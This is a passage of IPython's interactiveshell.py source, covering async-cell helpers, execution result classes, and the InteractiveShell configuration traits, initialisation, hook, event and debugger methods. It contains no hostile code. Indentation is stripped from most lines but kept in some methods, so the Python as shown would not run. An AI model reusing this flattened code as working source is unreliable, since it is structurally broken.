from IPython.utils.syspathcontext import prepended_to_syspath
from IPython.utils.text import format_screen, LSString, SList, DollarFormatter
from IPython.utils.tempdir import TemporaryDirectory
from traitlets import (
Integer, Bool, CaselessStrEnum, Enum, List, Dict, Unicode, Instance, Type,
observe, default, validate, Any
)
from warnings import warn
from logging import error
import IPython.core.hooks
from typing import List as ListType, Tuple, Optional
from ast import AST
# NoOpContext is deprecated, but ipykernel imports it from here.
# See https://github.com/ipython/ipykernel/issues/157
# (2016, let's try to remove than in IPython 8.0)
from IPython.utils.contexts import NoOpContext
try:
import docrepr.sphinxify as sphx
def sphinxify(doc):
with TemporaryDirectory() as dirname:
return {
'text/html': sphx.sphinxify(doc, dirname),
'text/plain': doc
}
except ImportError:
sphinxify = None
class ProvisionalWarning(DeprecationWarning):
"""
Warning class for unstable features
"""
pass
if sys.version_info > (3,8):
from ast import Module
else :
# mock the new API, ignore second argument
# see https://github.com/ipython/ipython/issues/11590
from ast import Module as OriginalModule
Module = lambda nodelist, type_ignores: OriginalModule(nodelist)
if sys.version_info > (3,6):
_assign_nodes = (ast.AugAssign, ast.AnnAssign, ast.Assign)
_single_targets_nodes = (ast.AugAssign, ast.AnnAssign)
else:
_assign_nodes = (ast.AugAssign, ast.Assign )
_single_targets_nodes = (ast.AugAssign, )
#-----------------------------------------------------------------------------
# Await Helpers
#-----------------------------------------------------------------------------
def removed_co_newlocals(function:types.FunctionType) -> types.FunctionType:
"""Return a function that do not create a new local scope.
Given a function, create a clone of this function where the co_newlocal flag
has been removed, making this function code actually run in the sourounding
scope.
We need this in order to run asynchronous code in user level namespace.
"""
from types import CodeType, FunctionType
CO_NEWLOCALS = 0x0002
code = function.__code__
new_co_flags = code.co_flags & ~CO_NEWLOCALS
if sys.version_info > (3, 8, 0, 'alpha', 3):
new_code = code.replace(co_flags=new_co_flags)
else:
new_code = CodeType(
code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
new_co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
code.co_name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars
)
return FunctionType(new_code, globals(), function.__name__, function.__defaults__)
# we still need to run things using the asyncio eventloop, but there is no
# async integration
from .async_helpers import (_asyncio_runner, _asyncify, _pseudo_sync_runner)
from .async_helpers import _curio_runner, _trio_runner, _should_be_async
def _ast_asyncify(cell:str, wrapper_name:str) -> ast.Module:
"""
Parse a cell with top-level await and modify the AST to be able to run it later.
Parameter
---------
cell: str
The code cell to asyncronify
wrapper_name: str
The name of the function to be used to wrap the passed `cell`. It is
advised to **not** use a python identifier in order to not pollute the
global namespace in which the function will be ran.
Return
------
A module object AST containing **one** function named `wrapper_name`.
The given code is wrapped in a async-def function, parsed into an AST, and
the resulting function definition AST is modified to return the last
expression.
The last expression or await node is moved into a return statement at the
end of the function, and removed from its original location. If the last
node is not Expr or Await nothing is done.
The function `__code__` will need to be later modified (by
``removed_co_newlocals``) in a subsequent step to not create new `locals()`
meaning that the local and global scope are the same, ie as if the body of
the function was at module level.
Lastly a call to `locals()` is made just before the last expression of the
function, or just after the last assignment or statement to make sure the
global dict is updated as python function work with a local fast cache which
is updated only on `local()` calls.
"""
from ast import Expr, Await, Return
if sys.version_info >= (3,8):
return ast.parse(cell)
tree = ast.parse(_asyncify(cell))
function_def = tree.body[0]
function_def.name = wrapper_name
try_block = function_def.body[0]
lastexpr = try_block.body[-1]
if isinstance(lastexpr, (Expr, Await)):
try_block.body[-1] = Return(lastexpr.value)
ast.fix_missing_locations(tree)
return tree
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
# compiled regexps for autoindent management
dedent_re = re.compile(r'^\s+raise|^\s+return|^\s+pass')
#-----------------------------------------------------------------------------
# Utilities
#-----------------------------------------------------------------------------
@undoc
def softspace(file, newvalue):
"""Copied from code.py, to remove the dependency"""
oldvalue = 0
try:
oldvalue = file.softspace
except AttributeError:
pass
try:
file.softspace = newvalue
except (AttributeError, TypeError):
# "attribute-less object" or "read-only attributes"
pass
return oldvalue
@undoc
def no_op(*a, **kw):
pass
class SpaceInInput(Exception): pass
def get_default_colors():
"DEPRECATED"
warn('get_default_color is deprecated since IPython 5.0, and returns `Neutral` on all platforms.',
DeprecationWarning, stacklevel=2)
return 'Neutral'
class SeparateUnicode(Unicode):
r"""A Unicode subclass to validate separate_in, separate_out, etc.
This is a Unicode based trait that converts '0'->'' and ``'\\n'->'\n'``.
"""
def validate(self, obj, value):
if value == '0': value = ''
value = value.replace('\\n','\n')
return super(SeparateUnicode, self).validate(obj, value)
@undoc
class DummyMod(object):
"""A dummy module used for IPython's interactive module when
a namespace must be assigned to the module's __dict__."""
__spec__ = None
class ExecutionInfo(object):
"""The arguments used for a call to :meth:`InteractiveShell.run_cell`
Stores information about what is going to happen.
"""
raw_cell = None
store_history = False
silent = False
shell_futures = True
def __init__(self, raw_cell, store_history, silent, shell_futures):
self.raw_cell = raw_cell
self.store_history = store_history
self.silent = silent
self.shell_futures = shell_futures
def __repr__(self):
name = self.__class__.__qualname__
raw_cell = ((self.raw_cell[:50] + '..')
if len(self.raw_cell) > 50 else self.raw_cell)
return '<%s object at %x, raw_cell="%s" store_history=%s silent=%s shell_futures=%s>' %\
(name, id(self), raw_cell, self.store_history, self.silent, self.shell_futures)
class ExecutionResult(object):
"""The result of a call to :meth:`InteractiveShell.run_cell`
Stores information about what took place.
"""
execution_count = None
error_before_exec = None
error_in_exec = None
info = None
result = None
def __init__(self, info):
self.info = info
@property
def success(self):
return (self.error_before_exec is None) and (self.error_in_exec is None)
def raise_error(self):
"""Reraises error if `success` is `False`, otherwise does nothing"""
if self.error_before_exec is not None:
raise self.error_before_exec
if self.error_in_exec is not None:
raise self.error_in_exec
def __repr__(self):
name = self.__class__.__qualname__
return '<%s object at %x, execution_count=%s error_before_exec=%s error_in_exec=%s info=%s result=%s>' %\
(name, id(self), self.execution_count, self.error_before_exec, self.error_in_exec, repr(self.info), repr(self.result))
class InteractiveShell(SingletonConfigurable):
"""An enhanced, interactive shell for Python."""
_instance = None
ast_transformers = List([], help=
"""
A list of ast.NodeTransformer subclass instances, which will be applied
to user input before code is run.
"""
).tag(config=True)
autocall = Enum((0,1,2), default_value=0, help=
"""
Make IPython automatically call any callable object even if you didn't
type explicit parentheses. For example, 'str 43' becomes 'str(43)'
automatically. The value can be '0' to disable the feature, '1' for
'smart' autocall, where it is not applied if there are no more
arguments on the line, and '2' for 'full' autocall, where all callable
objects are automatically called (even if no arguments are present).
"""
).tag(config=True)
autoindent = Bool(True, help=
"""
Autoindent IPython code entered interactively.
"""
).tag(config=True)
autoawait = Bool(True, help=
"""
Automatically run await statement in the top level repl.
"""
).tag(config=True)
loop_runner_map ={
'asyncio':(_asyncio_runner, True),
'curio':(_curio_runner, True),
'trio':(_trio_runner, True),
'sync': (_pseudo_sync_runner, False)
}
loop_runner = Any(default_value="IPython.core.interactiveshell._asyncio_runner",
allow_none=True,
help="""Select the loop runner that will be used to execute top-level asynchronous code"""
).tag(config=True)
@default('loop_runner')
def _default_loop_runner(self):
return import_item("IPython.core.interactiveshell._asyncio_runner")
@validate('loop_runner')
def _import_runner(self, proposal):
if isinstance(proposal.value, str):
if proposal.value in self.loop_runner_map:
runner, autoawait = self.loop_runner_map[proposal.value]
self.autoawait = autoawait
return runner
runner = import_item(proposal.value)
if not callable(runner):
raise ValueError('loop_runner must be callable')
return runner
if not callable(proposal.value):
raise ValueError('loop_runner must be callable')
return proposal.value
automagic = Bool(True, help=
"""
Enable magic commands to be called without the leading %.
"""
).tag(config=True)
banner1 = Unicode(default_banner,
help="""The part of the banner to be printed before the profile"""
).tag(config=True)
banner2 = Unicode('',
help="""The part of the banner to be printed after the profile"""
).tag(config=True)
cache_size = Integer(1000, help=
"""
Set the size of the output cache. The default is 1000, you can
change it permanently in your config file. Setting it to 0 completely
disables the caching system, and the minimum value accepted is 3 (if
you provide a value less than 3, it is reset to 0 and a warning is
issued). This limit is defined because otherwise you'll spend more
time re-flushing a too small cache than working
"""
).tag(config=True)
color_info = Bool(True, help=
"""
Use colors for displaying information about objects. Because this
information is passed through a pager (like 'less'), and some pagers
get confused with color codes, this capability can be turned off.
"""
).tag(config=True)
colors = CaselessStrEnum(('Neutral', 'NoColor','LightBG','Linux'),
default_value='Neutral',
help="Set the color scheme (NoColor, Neutral, Linux, or LightBG)."
).tag(config=True)
debug = Bool(False).tag(config=True)
disable_failing_post_execute = Bool(False,
help="Don't call post-execute functions that have failed in the past."
).tag(config=True)
display_formatter = Instance(DisplayFormatter, allow_none=True)
displayhook_class = Type(DisplayHook)
display_pub_class = Type(DisplayPublisher)
compiler_class = Type(CachingCompiler)
sphinxify_docstring = Bool(False, help=
"""
Enables rich html representation of docstrings. (This requires the
docrepr module).
""").tag(config=True)
@observe("sphinxify_docstring")
def _sphinxify_docstring_changed(self, change):
if change['new']:
warn("`sphinxify_docstring` is provisional since IPython 5.0 and might change in future versions." , ProvisionalWarning)
enable_html_pager = Bool(False, help=
"""
(Provisional API) enables html representation in mime bundles sent
to pagers.
""").tag(config=True)
@observe("enable_html_pager")
def _enable_html_pager_changed(self, change):
if change['new']:
warn("`enable_html_pager` is provisional since IPython 5.0 and might change in future versions.", ProvisionalWarning)
data_pub_class = None
exit_now = Bool(False)
exiter = Instance(ExitAutocall)
@default('exiter')
def _exiter_default(self):
return ExitAutocall(self)
# Monotonically increasing execution counter
execution_count = Integer(1)
filename = Unicode("<ipython console>")
ipython_dir= Unicode('').tag(config=True) # Set to get_ipython_dir() in __init__
# Used to transform cells before running them, and check whether code is complete
input_transformer_manager = Instance('IPython.core.inputtransformer2.TransformerManager',
())
@property
def input_transformers_cleanup(self):
return self.input_transformer_manager.cleanup_transforms
input_transformers_post = List([],
help="A list of string input transformers, to be applied after IPython's "
"own input transformations."
)
@property
def input_splitter(self):
"""Make this available for backward compatibility (pre-7.0 release) with existing code.
For example, ipykernel ipykernel currently uses
`shell.input_splitter.check_complete`
"""
from warnings import warn
warn("`input_splitter` is deprecated since IPython 7.0, prefer `input_transformer_manager`.",
DeprecationWarning, stacklevel=2
)
return self.input_transformer_manager
logstart = Bool(False, help=
"""
Start logging to the default log file in overwrite mode.
Use `logappend` to specify a log file to **append** logs to.
"""
).tag(config=True)
logfile = Unicode('', help=
"""
The name of the logfile to use.
"""
).tag(config=True)
logappend = Unicode('', help=
"""
Start logging to the given file in append mode.
Use `logfile` to specify a log file to **overwrite** logs to.
"""
).tag(config=True)
object_info_string_level = Enum((0,1,2), default_value=0,
).tag(config=True)
pdb = Bool(False, help=
"""
Automatically call the pdb debugger after every exception.
"""
).tag(config=True)
display_page = Bool(False,
help="""If True, anything that would be passed to the pager
will be displayed as regular output instead."""
).tag(config=True)
# deprecated prompt traits:
prompt_in1 = Unicode('In [\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_in2 = Unicode(' .\\D.: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_out = Unicode('Out[\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompts_pad_left = Bool(True,
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
@observe('prompt_in1', 'prompt_in2', 'prompt_out', 'prompt_pad_left')
def _prompt_trait_changed(self, change):
name = change['name']
warn("InteractiveShell.{name} is deprecated since IPython 4.0"
" and ignored since 5.0, set TerminalInteractiveShell.prompts"
" object directly.".format(name=name))
# protect against weird cases where self.config may not exist:
show_rewritten_input = Bool(True,
help="Show rewritten input, e.g. for autocall."
).tag(config=True)
quiet = Bool(False).tag(config=True)
history_length = Integer(10000,
help='Total length of command history'
).tag(config=True)
history_load_length = Integer(1000, help=
"""
The number of saved history entries to be loaded
into the history buffer at startup.
"""
).tag(config=True)
ast_node_interactivity = Enum(['all', 'last', 'last_expr', 'none', 'last_expr_or_assign'],
default_value='last_expr',
help="""
'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying
which nodes should be run interactively (displaying output from expressions).
"""
).tag(config=True)
# TODO: this part of prompt management should be moved to the frontends.
# Use custom TraitTypes that convert '0'->'' and '\\n'->'\n'
separate_in = SeparateUnicode('\n').tag(config=True)
separate_out = SeparateUnicode('').tag(config=True)
separate_out2 = SeparateUnicode('').tag(config=True)
wildcards_case_sensitive = Bool(True).tag(config=True)
xmode = CaselessStrEnum(('Context', 'Plain', 'Verbose', 'Minimal'),
default_value='Context',
help="Switch modes for the IPython exception handlers."
).tag(config=True)
# Subcomponents of InteractiveShell
alias_manager = Instance('IPython.core.alias.AliasManager', allow_none=True)
prefilter_manager = Instance('IPython.core.prefilter.PrefilterManager', allow_none=True)
builtin_trap = Instance('IPython.core.builtin_trap.BuiltinTrap', allow_none=True)
display_trap = Instance('IPython.core.display_trap.DisplayTrap', allow_none=True)
extension_manager = Instance('IPython.core.extensions.ExtensionManager', allow_none=True)
payload_manager = Instance('IPython.core.payload.PayloadManager', allow_none=True)
history_manager = Instance('IPython.core.history.HistoryAccessorBase', allow_none=True)
magics_manager = Instance('IPython.core.magic.MagicsManager', allow_none=True)
profile_dir = Instance('IPython.core.application.ProfileDir', allow_none=True)
@property
def profile(self):
if self.profile_dir is not None:
name = os.path.basename(self.profile_dir.location)
return name.replace('profile_','')
# Private interface
_post_execute = Dict()
# Tracks any GUI loop loaded for pylab
pylab_gui_select = None
last_execution_succeeded = Bool(True, help='Did last executed command succeeded')
last_execution_result = Instance('IPython.core.interactiveshell.ExecutionResult', help='Result of executing the last command', allow_none=True)
def __init__(self, ipython_dir=None, profile_dir=None,
user_module=None, user_ns=None,
custom_exceptions=((), None), **kwargs):
# This is where traits with a config_key argument are updated
# from the values on config.
super(InteractiveShell, self).__init__(**kwargs)
if 'PromptManager' in self.config:
warn('As of IPython 5.0 `PromptManager` config will have no effect'
' and has been replaced by TerminalInteractiveShell.prompts_class')
self.configurables = [self]
# These are relatively independent and stateless
self.init_ipython_dir(ipython_dir)
self.init_profile_dir(profile_dir)
self.init_instance_attrs()
self.init_environment()
# Check if we're in a virtualenv, and set up sys.path.
self.init_virtualenv()
# Create namespaces (user_ns, user_global_ns, etc.)
self.init_create_namespaces(user_module, user_ns)
# This has to be done after init_create_namespaces because it uses
# something in self.user_ns, but before init_sys_modules, which
# is the first thing to modify sys.
# TODO: When we override sys.stdout and sys.stderr before this class
# is created, we are saving the overridden ones here. Not sure if this
# is what we want to do.
self.save_sys_module_state()
self.init_sys_modules()
# While we're trying to have each part of the code directly access what
# it needs without keeping redundant references to objects, we have too
# much legacy code that expects ip.db to exist.
self.db = PickleShareDB(os.path.join(self.profile_dir.location, 'db'))
self.init_history()
self.init_encoding()
self.init_prefilter()
self.init_syntax_highlighting()
self.init_hooks()
self.init_events()
self.init_pushd_popd_magic()
self.init_user_ns()
self.init_logger()
self.init_builtins()
# The following was in post_config_initialization
self.init_inspector()
self.raw_input_original = input
self.init_completer()
# TODO: init_io() needs to happen before init_traceback handlers
# because the traceback handlers hardcode the stdout/stderr streams.
# This logic in in debugger.Pdb and should eventually be changed.
self.init_io()
self.init_traceback_handlers(custom_exceptions)
self.init_prompts()
self.init_display_formatter()
self.init_display_pub()
self.init_data_pub()
self.init_displayhook()
self.init_magics()
self.init_alias()
self.init_logstart()
self.init_pdb()
self.init_extension_manager()
self.init_payload()
self.init_deprecation_warnings()
self.hooks.late_startup_hook()
self.events.trigger('shell_initialized', self)
atexit.register(self.atexit_operations)
# The trio runner is used for running Trio in the foreground thread. It
# is different from `_trio_runner(async_fn)` in `async_helpers.py`
# which calls `trio.run()` for every cell. This runner runs all cells
# inside a single Trio event loop. If used, it is set from
# `ipykernel.kernelapp`.
self.trio_runner = None
    def get_ipython(self):
        """Return the currently running IPython instance.

        Also exposed in the user namespace as ``get_ipython()`` (see
        ``init_user_ns``).
        """
        return self
#-------------------------------------------------------------------------
# Trait changed handlers
#-------------------------------------------------------------------------
    @observe('ipython_dir')
    def _ipython_dir_changed(self, change):
        # Trait-change handler: make sure the newly-set IPython directory
        # actually exists on disk.
        ensure_dir_exists(change['new'])
def set_autoindent(self,value=None):
"""Set the autoindent flag.
If called with no arguments, it acts as a toggle."""
if value is None:
self.autoindent = not self.autoindent
else:
self.autoindent = value
    def set_trio_runner(self, tr):
        """Install the runner used to run all cells in one Trio event loop.

        Set from ``ipykernel.kernelapp`` (see the note in ``__init__``);
        ``None`` means no Trio runner is active.
        """
        self.trio_runner = tr
#-------------------------------------------------------------------------
# init_* methods called by __init__
#-------------------------------------------------------------------------
def init_ipython_dir(self, ipython_dir):
if ipython_dir is not None:
self.ipython_dir = ipython_dir
return
self.ipython_dir = get_ipython_dir()
def init_profile_dir(self, profile_dir):
if profile_dir is not None:
self.profile_dir = profile_dir
return
self.profile_dir = ProfileDir.create_profile_dir_by_name(
self.ipython_dir, "default"
)
    def init_instance_attrs(self):
        """Initialize miscellaneous per-instance state attributes."""
        # More-style paging flag.
        self.more = False
        # command compiler
        self.compile = self.compiler_class()
        # Make an empty namespace, which extension writers can rely on both
        # existing and NEVER being used by ipython itself. This gives them a
        # convenient location for storing additional information and state
        # their extensions may require, without fear of collisions with other
        # ipython names that may develop later.
        self.meta = Struct()
        # Temporary files used for various purposes. Deleted at exit.
        self.tempfiles = []
        self.tempdirs = []
        # keep track of where we started running (mainly for crash post-mortem)
        # This is not being used anywhere currently.
        self.starting_dir = os.getcwd()
        # Indentation management
        self.indent_current_nsp = 0
        # Dict to track post-execution functions that have been registered
        self._post_execute = {}
    def init_environment(self):
        """Any changes we need to make to the user's environment."""
        # Base implementation is deliberately a no-op; subclasses may override.
        pass
def init_encoding(self):
# Get system encoding at startup time. Certain terminals (like Emacs
# under Win32 have it set to None, and we need to have a known valid
# encoding to use in the raw_input() method
try:
self.stdin_encoding = sys.stdin.encoding or 'ascii'
except AttributeError:
self.stdin_encoding = 'ascii'
    @observe('colors')
    def init_syntax_highlighting(self, changes=None):
        """(Re)build the source colorizer; re-run whenever `colors` changes."""
        # Python source parser/formatter for syntax highlighting
        pyformat = PyColorize.Parser(style=self.colors, parent=self).format
        # pycolorize(src) returns the highlighted source as a string.
        self.pycolorize = lambda src: pyformat(src,'str')
    def refresh_style(self):
        """Refresh styling after a color change."""
        # No-op here, used in subclass
        pass
    def init_pushd_popd_magic(self):
        """Set up the state used by the %pushd/%popd directory-stack magics."""
        # for pushd/popd management
        self.home_dir = get_home_dir()
        self.dir_stack = []
    def init_logger(self):
        """Create the rotating session Logger (activated via init_logstart)."""
        self.logger = Logger(self.home_dir, logfname='ipython_log.py',
                             logmode='rotate')
def init_logstart(self):
"""Initialize logging in case it was requested at the command line.
"""
if self.logappend:
self.magic('logstart %s append' % self.logappend)
elif self.logfile:
self.magic('logstart %s' % self.logfile)
elif self.logstart:
self.magic('logstart')
def init_deprecation_warnings(self):
"""
register default filter for deprecation warning.
This will allow deprecation warning of function used interactively to show
warning to users, and still hide deprecation warning from libraries import.
"""
if sys.version_info < (3,7):
warnings.filterwarnings("default", category=DeprecationWarning, module=self.user_ns.get("__name__"))
    def init_builtins(self):
        """Inject IPython markers into the builtin namespace and set the trap."""
        # A single, static flag that we set to True.  Its presence indicates
        # that an IPython shell has been created, and we make no attempts at
        # removing on exit or representing the existence of more than one
        # IPython at a time.
        builtin_mod.__dict__['__IPYTHON__'] = True
        # Make display() available without an import.
        builtin_mod.__dict__['display'] = display
        self.builtin_trap = BuiltinTrap(shell=self)
    @observe('colors')
    def init_inspector(self, changes=None):
        """(Re)create the object inspector; re-run whenever `colors` changes."""
        # Object inspector
        self.inspector = oinspect.Inspector(oinspect.InspectColors,
                                            PyColorize.ANSICodeColors,
                                            self.colors,
                                            self.object_info_string_level)
    def init_io(self):
        """Point the deprecated IPython io streams at sys.stdout/sys.stderr.

        NOTE: `io` here is IPython's utils.io module (it provides IOStream),
        not the stdlib io module.
        """
        # This will just use sys.stdout and sys.stderr. If you want to
        # override sys.stdout and sys.stderr themselves, you need to do that
        # *before* instantiating this class, because io holds onto
        # references to the underlying streams.
        # io.std* are deprecated, but don't show our own deprecation warnings
        # during initialization of the deprecated API.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            io.stdout = io.IOStream(sys.stdout)
            io.stderr = io.IOStream(sys.stderr)
def init_prompts(self):
# Set system prompts, so that scripts can decide if they are running
# interactively.
sys.ps1 = 'In : '
sys.ps2 = '...: '
sys.ps3 = 'Out: '
    def init_display_formatter(self):
        """Create the DisplayFormatter and register it as a configurable."""
        self.display_formatter = DisplayFormatter(parent=self)
        self.configurables.append(self.display_formatter)
    def init_display_pub(self):
        """Instantiate display_pub_class and register it as a configurable."""
        self.display_pub = self.display_pub_class(parent=self, shell=self)
        self.configurables.append(self.display_pub)
def init_data_pub(self):
if not self.data_pub_class:
self.data_pub = None
return
self.data_pub = self.data_pub_class(parent=self)
self.configurables.append(self.data_pub)
    def init_displayhook(self):
        """Create the displayhook (Out-prompt cache) and its install trap."""
        # Initialize displayhook, set in/out prompts and printing system
        self.displayhook = self.displayhook_class(
            parent=self,
            shell=self,
            cache_size=self.cache_size,
        )
        self.configurables.append(self.displayhook)
        # This is a context manager that installs/removes the displayhook at
        # the appropriate time.
        self.display_trap = DisplayTrap(hook=self.displayhook)
    def init_virtualenv(self):
        """Add a virtualenv to sys.path so the user can import modules from it.
        This isn't perfect: it doesn't use the Python interpreter with which the
        virtualenv was built, and it ignores the --no-site-packages option. A
        warning will appear suggesting the user installs IPython in the
        virtualenv, but for many cases, it probably works well enough.

        Adapted from code snippets online.

        http://blog.ufsoft.org/2009/1/29/ipython-and-virtualenv
        """
        if 'VIRTUAL_ENV' not in os.environ:
            # Not in a virtualenv
            return

        p = os.path.normcase(sys.executable)
        p_venv = os.path.normcase(os.environ['VIRTUAL_ENV'])
        # executable path should end like /bin/python or \\scripts\\python.exe
        p_exe_up2 = os.path.dirname(os.path.dirname(p))
        if p_exe_up2 and os.path.exists(p_venv) and os.path.samefile(p_exe_up2, p_venv):
            # Our exe is inside the virtualenv, don't need to do anything.
            return

        # fallback venv detection:
        # stdlib venv may symlink sys.executable, so we can't use realpath.
        # but others can symlink *to* the venv Python, so we can't just use sys.executable.
        # So we just check every item in the symlink tree (generally <= 3)
        paths = [p]
        while os.path.islink(p):
            p = os.path.normcase(os.path.join(os.path.dirname(p), os.readlink(p)))
            paths.append(p)

        # In Cygwin paths like "c:\..." and '\cygdrive\c\...' are possible
        if p_venv.startswith('\\cygdrive'):
            # drop the leading '\cygdrive\X' (11 chars) so only the path tail
            # is compared against the interpreter paths below
            p_venv = p_venv[11:]
        elif len(p_venv) >= 2 and p_venv[1] == ':':
            # drop the 'X:' drive prefix for the same reason
            p_venv = p_venv[2:]

        if any(p_venv in p for p in paths):
            # Running properly in the virtualenv, don't need to do anything
            return

        warn("Attempting to work in a virtualenv. If you encounter problems, please "
             "install IPython inside the virtualenv.")
        if sys.platform == "win32":
            virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'Lib', 'site-packages')
        else:
            virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'lib',
                   'python%d.%d' % sys.version_info[:2], 'site-packages')

        import site
        sys.path.insert(0, virtual_env)
        site.addsitedir(virtual_env)
#-------------------------------------------------------------------------
# Things related to injections into the sys module
#-------------------------------------------------------------------------
def save_sys_module_state(self):
"""Save the state of hooks in the sys module.
This has to be called after self.user_module is created.
"""
self._orig_sys_module_state = {'stdin': sys.stdin,
'stdout': sys.stdout,
'stderr': sys.stderr,
'excepthook': sys.excepthook}
self._orig_sys_modules_main_name = self.user_module.__name__
self._orig_sys_modules_main_mod = sys.modules.get(self.user_module.__name__)
def restore_sys_module_state(self):
"""Restore the state of the sys module."""
try:
for k, v in self._orig_sys_module_state.items():
setattr(sys, k, v)
except AttributeError:
pass
# Reset what what done in self.init_sys_modules
if self._orig_sys_modules_main_mod is not None:
sys.modules[self._orig_sys_modules_main_name] = self._orig_sys_modules_main_mod
#-------------------------------------------------------------------------
# Things related to the banner
#-------------------------------------------------------------------------
@property
def banner(self):
banner = self.banner1
if self.profile and self.profile != 'default':
banner += '\nIPython profile: %s\n' % self.profile
if self.banner2:
banner += '\n' + self.banner2
return banner
def show_banner(self, banner=None):
if banner is None:
banner = self.banner
sys.stdout.write(banner)
#-------------------------------------------------------------------------
# Things related to hooks
#-------------------------------------------------------------------------
    def init_hooks(self):
        """Install the default hooks from IPython.core.hooks."""
        # hooks holds pointers used for user-side customizations
        self.hooks = Struct()

        self.strdispatchers = {}

        # Set all default hooks, defined in the IPython.hooks module.
        hooks = IPython.core.hooks
        for hook_name in hooks.__all__:
            # default hooks have priority 100, i.e. low; user hooks should have
            # 0-100 priority
            self.set_hook(hook_name,getattr(hooks,hook_name), 100, _warn_deprecated=False)

        if self.display_page:
            self.set_hook('show_in_pager', page.as_hook(page.display_page), 90)
    def set_hook(self,name,hook, priority=50, str_key=None, re_key=None,
                 _warn_deprecated=True):
        """set_hook(name,hook) -> sets an internal IPython hook.

        IPython exposes some of its internal API as user-modifiable hooks.  By
        adding your function to one of these hooks, you can modify IPython's
        behavior to call at runtime your own routines."""

        # At some point in the future, this should validate the hook before it
        # accepts it.  Probably at least check that the hook takes the number
        # of args it's supposed to.

        # Bind the hook to this shell instance so it receives `self`.
        f = types.MethodType(hook,self)

        # check if the hook is for strdispatcher first
        if str_key is not None:
            sdp = self.strdispatchers.get(name, StrDispatch())
            sdp.add_s(str_key, f, priority )
            self.strdispatchers[name] = sdp
            return
        if re_key is not None:
            sdp = self.strdispatchers.get(name, StrDispatch())
            sdp.add_re(re.compile(re_key), f, priority )
            self.strdispatchers[name] = sdp
            return

        dp = getattr(self.hooks, name, None)
        if name not in IPython.core.hooks.__all__:
            print("Warning! Hook '%s' is not one of %s" % \
                  (name, IPython.core.hooks.__all__ ))

        if _warn_deprecated and (name in IPython.core.hooks.deprecated):
            alternative = IPython.core.hooks.deprecated[name]
            warn("Hook {} is deprecated. Use {} instead.".format(name, alternative), stacklevel=2)

        if not dp:
            dp = IPython.core.hooks.CommandChainDispatcher()

        try:
            dp.add(f,priority)
        except AttributeError:
            # it was not commandchain, plain old func - replace
            dp = f

        setattr(self.hooks,name, dp)
#-------------------------------------------------------------------------
# Things related to events
#-------------------------------------------------------------------------
    def init_events(self):
        """Create the EventManager and register built-in callbacks."""
        self.events = EventManager(self, available_events)

        # Keep the warning registry clean between executed code blocks.
        self.events.register("pre_execute", self._clear_warning_registry)
    def register_post_execute(self, func):
        """DEPRECATED: Use ip.events.register('post_run_cell', func)

        Register a function for calling after code execution.
        """
        # Kept for backward compatibility only; forwards to the events system.
        warn("ip.register_post_execute is deprecated, use "
             "ip.events.register('post_run_cell', func) instead.", stacklevel=2)
        self.events.register('post_run_cell', func)
def _clear_warning_registry(self):
# clear the warning registry, so that different code blocks with
# overlapping line number ranges don't cause spurious suppression of
# warnings (see gh-6611 for details)
if "__warningregistry__" in self.user_global_ns:
del self.user_global_ns["__warningregistry__"]
#-------------------------------------------------------------------------
# Things related to the "main" module
#-------------------------------------------------------------------------
def new_main_mod(self, filename, modname):
"""Return a new 'main' module object for user code execution.
``filename`` should be the path of the script which will be run in the
module. Requests with the same filename will get the same module, with
its namespace cleared.
``modname`` should be the module name - normally either '__main__' or
the basename of the file without the extension.
When scripts are executed via %run, we must keep a reference to their
__main__ module around so that Python doesn't
clear it, rendering references to module globals useless.
This method keeps said reference in a private dict, keyed by the
absolute path of the script. This way, for multiple executions of the
same script we only keep one copy of the namespace (the last one),
thus preventing memory leaks from old references while allowing the
objects from the last execution to be accessible.
"""
filename = os.path.abspath(filename)
try:
main_mod = self._main_mod_cache[filename]
except KeyError:
main_mod = self._main_mod_cache[filename] = types.ModuleType(
modname,
doc="Module created for script run in IPython")
else:
main_mod.__dict__.clear()
main_mod.__name__ = modname
main_mod.__file__ = filename
# It seems pydoc (and perhaps others) needs any module instance to
# implement a __nonzero__ method
main_mod.__nonzero__ = lambda : True
return main_mod
def clear_main_mod_cache(self):
"""Clear the cache of main modules.
Mainly for use by utilities like %reset.
Examples
--------
In [15]: import IPython
In [16]: m = _ip.new_main_mod(IPython.__file__, 'IPython')
In [17]: len(_ip._main_mod_cache) > 0
Out[17]: True
In [18]: _ip.clear_main_mod_cache()
In [19]: len(_ip._main_mod_cache) == 0
Out[19]: True
"""
self._main_mod_cache.clear()
#-------------------------------------------------------------------------
# Things related to debugging
#-------------------------------------------------------------------------
    def init_pdb(self):
        """Initialize auto-activation of pdb from the `pdb` configurable."""
        # Set calling of pdb on exceptions
        # self.call_pdb is a property
        self.call_pdb = self.pdb
    def _get_call_pdb(self):
        # Getter for the call_pdb property below.
        return self._call_pdb

    def _set_call_pdb(self,val):
        # Setter for call_pdb: accept only boolean-ish values and propagate
        # the flag to the interactive traceback handler.
        if val not in (0,1,False,True):
            raise ValueError('new call_pdb value must be boolean')

        # store value in instance
        self._call_pdb = val

        # notify the actual exception handlers
        self.InteractiveTB.call_pdb = val

    call_pdb = property(_get_call_pdb,_set_call_pdb,None,
                        'Control auto-activation of pdb at exceptions')
    def debugger(self,force=False):
        """Call the pdb debugger.

        Keywords:

          - force(False): by default, this routine checks the instance call_pdb
            flag and does not actually invoke the debugger if the flag is false.
            The 'force' option forces the debugger to activate even if the flag
            is false.
        """
        if not (force or self.call_pdb):
            return

        # Nothing to debug unless an exception left a traceback behind.
        if not hasattr(sys,'last_traceback'):
            error('No traceback has been produced, nothing to debug.')
            return

